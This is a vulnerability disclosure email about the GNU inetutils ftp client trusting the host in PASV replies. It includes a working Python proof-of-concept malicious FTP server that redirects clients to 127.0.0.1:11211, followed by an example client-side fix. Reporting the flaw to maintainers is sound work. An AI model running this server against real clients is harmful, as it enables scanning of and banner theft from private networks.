From: ZeddYu Lu
Subject: security issue in inetutils ftp client
Date: Fri, 11 Jun 2021 17:46:13 +0800
https://hackerone.com/reports/1040166
The problem is that the ftp client trusts the host from the PASV response by default. A malicious server can trick the ftp client into connecting back to a given IP address and port. This may make the ftp client scan ports and extract service banners from a private network.
After testing FTP in GNU inetutils, I found the ftp client has the same problem.
Inetutils Version:
ftp (GNU inetutils) 2.0 Copyright (C) 2021 Free Software Foundation, Inc.
evil ftp server in python:
#!/usr/bin/env python3
import socketserver, threading, time, sys

class MyTCPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # Scripted session: each client command is logged to stderr and
        # answered with a fixed reply, whatever the command was.
        print('[+] connected', self.request, file=sys.stderr)
        self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr,flush=True)
        self.request.sendall(b'230 Login successful.\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        # The 227 reply advertises 127.0.0.1, port 43*256+203 = 11211,
        # rather than the address the client is connected to.
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'200 Switching to Binary mode.\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'250 Requested file action okay, completed.')
        exit()

def ftp_worker():
    with socketserver.TCPServer(('0.0.0.0', 21), MyTCPHandler) as server:
        while True:
            server.handle_request()

threading.Thread(target=ftp_worker).start()
time.sleep(2)
Python also fixed this issue this year. Maybe this will help you. https://bugs.python.org/issue43285
You can find more impacts in https://hackerone.com/reports/1040166
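The client-side check that closes this hole, as an added example (not code from the message above or from inetutils): parse the 227 reply, take only the port from it, and connect the data channel to the address the control connection is already using. The function names, the `trust_server_address` switch and the peer address `203.0.113.10` are assumptions made for the illustration.

```python
import ipaddress
import re

# Six comma-separated decimal fields h1,h2,h3,h4,p1,p2 (RFC 959 reply 227).
_PASV_RE = re.compile(
    r"(?<!\d)(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})(?!\d)"
)


def parse_pasv(reply):
    """Return (advertised_host, port) from a 227 reply, or raise ValueError."""
    if not reply.startswith("227"):
        raise ValueError("not a 227 reply")
    m = _PASV_RE.search(reply)
    if m is None:
        raise ValueError("no address in 227 reply")
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError("field out of range in 227 reply")
    host = ".".join(str(f) for f in fields[:4])
    return host, fields[4] * 256 + fields[5]


def data_endpoint(reply, control_peer, trust_server_address=False):
    """Pick the address for the data connection.

    control_peer is the IP the control connection is really connected to
    (what getpeername() returns on that socket). Unless the caller opts in,
    the host advertised by the server is ignored and only its port is used.
    Returns (host, port, mismatch); mismatch is worth logging.
    """
    advertised, port = parse_pasv(reply)
    mismatch = ipaddress.ip_address(advertised) != ipaddress.ip_address(control_peer)
    host = advertised if trust_server_address else control_peer
    return host, port, mismatch


# Reply copied from the server script above; PEER is a constructed
# documentation-range address standing in for the control connection peer.
REPLY = "227 Entering Passive Mode (127,0,0,1,43,203)"
PEER = "203.0.113.10"

if __name__ == "__main__":
    host, port, mismatch = data_endpoint(REPLY, PEER)
    print(f"data connection -> {host}:{port}, advertised host differed: {mismatch}")
```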